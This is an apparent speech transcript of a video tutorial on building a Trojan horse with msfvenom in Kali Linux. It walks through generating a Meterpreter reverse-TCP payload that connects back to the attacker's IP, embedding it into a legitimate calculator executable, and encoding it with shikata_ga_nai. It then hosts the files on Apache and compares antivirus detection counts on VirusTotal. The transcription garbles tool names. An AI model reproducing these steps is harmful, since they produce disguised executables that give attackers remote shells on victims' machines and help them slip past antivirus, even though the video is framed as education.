Hello everyone, welcome to the second session of this basic hacking video entire series. In this session we see what is the Trojan Horse, how to practically implement the Trojan Horse. So before start the Trojan Horse introduction, first of all I introduce myself for the new watchers. So I am Yash, and my name is Yash and Sanghavi, and I am an instructor of this design and analysis of algorithm project group. So in this session we see what is the theoretical part of the Trojan Horse, and after that we implement the practical stuff of the Trojan Horse. So let's move to the next slide to see what is the Trojan Horse. So basically the Trojan Horse is a program downloaded and installed on a computer that appears the harmful but is in fact malicious, unexpected changes to computer's setting and unusual activity. So typically the Trojan Horse is hidden in an innocent looking email attachment or the free downloaded. When the user click on the email attachment or download the free program, the malware that is the hidden inside is transferred to the user's computing device. So once inside, the malicious code can execute whatever task the attacker designed it to carry out. So this is the basics of the Trojan Horse. So let's move to the practical implementation of the Trojan Horse. So in the Kali Linux we implement the Trojan Horse using the MSVE gnome. The MSVE gnome is such a powerful tool that is a combination of the MSF payload and MSFin code, MSF encode. These two are the combined with the MSVE gnome. In the 2015 or before that, their MSF payload and MSF encode are the two different activities defined in the Linux. But after the 2015, the Linux operating system is the combine the MSF payload and MSF encode into the MSF gnome. So we use that and we encode or the payloaded and embed to the Windows application for a Trojan to anyone. So this is the Trojan Horse. Why the Trojan Horse name used for this virus is because there is the very good story for that. In the Greek there is a one king, or like the story that are the, if you want to know that, then you search on the Google, you get the information about this Trojan Horse story. So let's move to the practical implementation of this Trojan Horse. So for the implementation of the Trojan Horse, we open our Kali Linux operating system and just type the username, that is the root, and the password, and it take the 1 or 2 minutes for the desktop preparation. So our Kali Linux is open. Now go to the terminal. Oh sorry, this is my Windows system. Go to the terminal and just type the MSFV gnome -L. No, first of all we check all the options of the MSVE gnome. So just type the -H, and you see that there is the lots of options that are used for the MSVE gnome. So we use the -L, -P, after that -K, that are options we are the used, and different options are the provided in the MSV gnome. There is the for the iteration there is a, for the encoding iteration there is also provided one option, that is, yeah, this is the -I option. So there is the different option for the different behavior of this MSV gnome. So just we use the different options is, and you get familiar with that all the options is. If you want to know the if you want to know the details about this all the options, then you can do the Google it in the Linux organization website. There is the provide the good description about all the options is. So just type the, now let's move to the MSV gnome. So just type the MSFVE gnome, and first we create, we don't create, but we use the different payloads that are the provided by the MSV gnome. So basically those who are the interested with the computer network security, who that knows about the payload, but those who are not, just listen my words and you can either you get the idea what is the payload. The payload refers to the component of a computer virus that execute a malicious activity. Apart from the speed in which a virus spread, the threat level, all thought, not all viruses carry a payload. A few payloads are the considered extremely dangerous. So some of the example of the payload are the data destruction, offensive message, and the delivery of a spam email through the infected user's account. A payload is also known as a destructive payload. So these are the payload basic definition. So the threat level of a virus is calculated by the damage it makes. So virus with more powerful payload tend to be more harmful. So this IT world at 2019 time, the different users uses the Trojan Horse and the payloads for the different stealing information, or the EVAs dropping information, or different type of attacks that it can be done using the payload. So this is the basics of the basic definitions of the payload, and let's move to the creation. Let's move for the choosing the payload that are the different or the good payload are the by default provided by the MSV gnome. So we can choose from that. So just type the MSV gnome -L. So 1 minute. Yeah. MSV gnome -L, the payloads, so it take 1 minute for the defining all the list of the payloads that are the provided by the MSV gnome. So you see that all the MSV gnome payload are the provided. So we use the Windows /reverse TCP payload. So 1 minute, I want to take to search. Yeah, Windows. So where is so we use this Windows and Windows /metapredators /reverse TCP. So we use this payload for doing the perform the Trojan Horse. So just first of all type the C clear and type the MSFVE gnome -P, the Windows Windows meta preter data slash reverse underscore TCP L host equals to in the L host we type the our IP address. So first of all I would to like to first I connect myself to Ethernet 1 and now I just type the I use the and see the what is my IP address. So my IP address is a 192.168.43.53. So this IP address I used for the this IP address is the my IP address. This IP address is the used for this Kali Linux. So just type the 192.168.43.53 and just type the L port equals to 443. So you can use any different ports, but generally in the computer the 443 ports are the open, so I use that and -f exe and just type the out1 dot exe. So it take 1 minute for generating this out1 dot exe. So yeah, look at this out1.exe. This will generate the file, and if you want to look at that this file, this is the out1.exe. This is the harmful file. If you want to scan in the antivirus, that it can detect the threat from this file. So generally the hacker's aim is to create a Trojan horse that cannot cannot detect the any antivirus, cannot detect by any antivirus. So this is the general hacker's aim, but our aim is to create a virus for the understand the Trojan horse attack. So we cannot go in a way that the keep the secure things so that the different antivirus cannot detect that file. So let's now go to the terminal again. So this is the basic the file created and it has just a payload or the like the information. This is not a Trojan horse attack, but I can provide this, I can define this way because you are the familiar with that how to create the different Trojan horse files. So basically the Trojan horse means to embed the harmful file with the any specific window machines or the any operating system file. So if the basic file is open, then this Trojan horse is going to be active and it going to do the attack. So this is basic the aim. So we use that. So we create that type of attack that can embed the our harmful file with the any good file. So if you look at my file, there is a one clc.exe. This is the basically calculator file of the Windows machine. That so I downloaded this from the Firefox. So if you want to download that, just type the clc1.exe download and you get the first link. you get the Microsoft website, and just click on the download and you get the clc1.exe. So I am use this file for the embedding my harmful out1.exe. So just go to the terminal, and now it's time for the attaching our harmful file to the good file. So just type ms fve no -p windows /metal return, and use the payload reverse _tcd. Now I'll define our source, that is the 192.168.43.53. 43.53, and just type the L port equals to 443 and -f exe -x. So this is the -f and x. If you want to attach any exe file, then this -f or -x option is going to be used, and this is the exe -x and .clc, that which file we use for the attack, clc.exe, and you generate what name of that file. So just type the out2.exe. It takes again the 1 and 2 minutes for generating the danger file. So yeah, our Windows file is generated. If you want to look at this file, then just type the ls, and there is out2.exe. This file is basically the calculator file that are the hacker used for providing the free software or like the stuff. And if you just download that file and click OK and give the administrative permission, then it can exploit your computer with the securities or the anything. So this Trojan Horse attack is really the dangerous attack. So this is the we doing this simple create the calculator file, and now we use the encoding for the payload. So the context encoding is a technique for generating the self-decrypting shellcode that will work only on the now intended machine, and nowadays the antivirus is easily catch up this encoding. So this technique is not useful, but we see for the knowledge purpose. So just type the msvgnome and calculator.exe. that is the previously we are doing the coding, and after that just type the space and -e, and just type the x86. This is the encoding type of this payload _ga_na shikataka na. And now if we choose that how many iterations that we are to iterate, that just type the -i and the space type the 400 and change the file 3. sorry, yeah, 3 dot out 3 dot exe. Yeah, just type enter. Again it takes 1 minute. Yeah, it generates the iteration. This is the 2 7 18 9 30 50, and now it's time for the 400. So this payload size is will be now the 1189 bytes, and the final size is about 115200 bytes. So because of the encoding. So this is the basically the context encoding technique for the MSV gnome. And now we check the third option for the MSV gnome, and this is the very basic option, and this option is not useful in all the cases. Some exe file will be generated, some exe file this accept this option, but some are not working. This not provide a guarantee for the working this -k option. The -k means the keep the template as it is and create the new encoding type, and just -k options. So just type the -i400 if you want to know the what is the -k option. Then just type the MSV gnome and -h, and it has a -k options. Yeah, keep means the preserve the minus template behavior and inject the payload as a new thread. So this are the not working in all exe, but we almost working the 50 to 70% exe. So don't worry about the not working about this. klc.exe is working with this keep. I checked before the video shooting. So just type the -i400, and after that this -400 just type -k and press the enter. Again it takes 1 or minutes for generating the file. Okay, now we generate the total. Now we see the how many files we generate. Out.1.exe, out.2.exe, out.3.exe, and just use the okay, our last attack is the override the other file. Our last option is override the second option. So now that not it can be tricky. Just fire the commands that are the just fire the command of MSV gnome, and it create all the payloads or the encoded like stuff, and it just type the -x or -f option for the generating the Windows or the Mac OS file for the attacking purpose. So now testing this out1.exe, out2.exe, that is whether it is harmful or not. So first of all, we copy this file to the localhost so that the Windows user can get this file, and it can check or it can detect the thread from this file. So just go to the terminal and type the cp out /var/www/html. This is the default directory of the web application server of the root of the Kali Linux. So HTML, okay, is not a directory. 1 minute. Okay. Okay. Okay, this HTML file is present. Why it's giving the error? 1 minute. Okay, now this copy is successful because the HTML file is cannot be present. I created that, and now just type the cp var www html slash. So cp missing the destination file, operand after variable www. One minute. So basically, so this command is cannot work, but this command is work. So why we use this command? So just by using this command, we copy this out star dot file to the our Apache folder. So now just start the Apache services. So just type the service space Apache 2 space start. Yes, our Apache service is going now to start. Now just go to the window machine and just type the source IP address and slash out1.exe and type enter. It get our out1.exe file. Just save file, and after that just type out2.exe. And after that just 3.exe and save file. Now going to Google don't know, and just type the virus total. Go to the first site. Yeah, virus total is open, and just for this part is for the detecting purpose. Date, and just open this file, confirm. Yeah. Setting up the environment. This antivirus is such a good antivirus, because if you want to detect if you know that this file has some Trojan or anything, then just upload that file or the zip file on this virus total, and you get the result whether it is harmful or not, because it has the top 30 to 50 virus scan. So whatever the virus this file have, that can be detected using this virustotal.com. So you can see that this out1.exe has a 51 thread and still progress, and the final result is a 52. So this is the 52. This first file have the 52. Now check the second file. Out2.exe. Confirm. So you see that this all the different antiviruses. So look at in the first file it detects the 51 thread, and in the second it has just a 45. So this antivirus, this Avast mobile mass cafe and a K7 antivirus, and this antivirus cannot detect thread in our file. So if the hacker want to attack in that type of antivirus, then it can easily manage the things. So now it's time for the third file. And the third file. I think this file have the minimum thread. Let's see what is the result is going to be get. 41, the best is a 50. Okay, so the minus K has defined the minimum result, and the 44 antiviruses are the detect virus in that file, and this anti-EVN on the 10 cent, this antivirus cannot detect virus on our file. So this is the result, and if you want to exploit that, you can do it. I provide the code for that, but now I don't want to harm my Windows laptop, so I cannot exploit the things. But if you want, then I provide that code for that. So thank you for your time, and we will meet at the next session of this video entire series course. So thank you.